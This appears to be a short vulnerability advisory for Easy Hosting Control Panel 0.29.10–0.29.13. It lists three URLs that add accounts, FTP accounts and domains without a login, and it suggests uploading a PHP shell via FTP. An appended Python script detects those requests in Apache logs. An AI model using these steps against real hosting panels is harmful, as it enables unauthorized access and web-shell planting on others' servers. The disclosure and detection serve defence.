Title: Easy Hosting Control Panel Admin Auth Bypass
Author: Jasman
Download: https://launchpad.net/ehcp & http://www.ehcp.net
Affected versions: 0.29.10 - 0.29.13
Tested on: Ubuntu, Debian
Overview
Easy Hosting Control Panel is designed for hosting multiple domains on a single machine.
It uses LAMP (Linux, Apache, MySQL, PHP). Its aims: easy to install, easy to use, non-complex, functional.
Vulnerability:
FTP accounts and domains can be added without logging in.
http://[host]/vhosts/ehcp/?op=applyforaccount
http://[host]/vhosts/ehcp/?op=applyforftpaccount
http://[host]/vhosts/ehcp/?op=applyfordomainaccount
Example
Upload a shell via FTP
http://[host]/vhosts/[username]/[domain]/httpdocs/shell.php
Tested versions
0.29.13
0.29.11
0.29.10
Fix: add authentication
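
Until the fix is in place, access logs can be checked for use of the three operations listed above. The following Python check is an added example, not part of the original advisory or the EHCP code base. It assumes Apache "combined" log format and that the panel is served under /vhosts/ehcp as in the advisory's URLs; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Operations the advisory lists as reachable without a login.
UNAUTH_OPS = {"applyforaccount", "applyforftpaccount", "applyfordomainaccount"}

# Assumed input: Apache "combined" access-log lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_unauth_signups(lines, panel_prefix="/vhosts/ehcp"):
    """Return (ip, timestamp, method, op, status) for each request to a listed op."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        url = urlsplit(m["target"])
        if not url.path.lower().startswith(panel_prefix):
            continue
        # parse_qs percent-decodes, so op=%61pplyforaccount is still matched.
        ops = {v.strip().lower() for v in parse_qs(url.query).get("op", [])}
        for op in sorted(ops & UNAUTH_OPS):
            hits.append((m["ip"], m["ts"], m["method"], op, int(m["status"])))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2012:10:01:44 +0000] '
    '"GET /vhosts/ehcp/?op=applyforftpaccount HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2012:10:02:10 +0000] '
    '"POST /vhosts/ehcp/index.php?op=%61pplyfordomainaccount HTTP/1.1" 200 4981 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [12/Mar/2012:10:05:00 +0000] '
    '"GET /vhosts/ehcp/ HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    'truncated or malformed line',
]

if __name__ == "__main__":
    for hit in find_unauth_signups(SAMPLE_LOG):
        print(hit)
```

Each hit is a starting point for reviewing the FTP accounts and domains created on the panel around that timestamp.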
Credits:
ArRay,`yuda, N4ck0, K4pt3N, samu1241, bejamz, Gameover, antitos, yuki, pokeng,
aphe_aphe, jos_ali_joe, BlueBoyz, JFry_, Ihsana'Lab, Anaski Crew, Forum.ExploreCrew
Exploit-Id, FeeLcoMz All Indonesian Hacker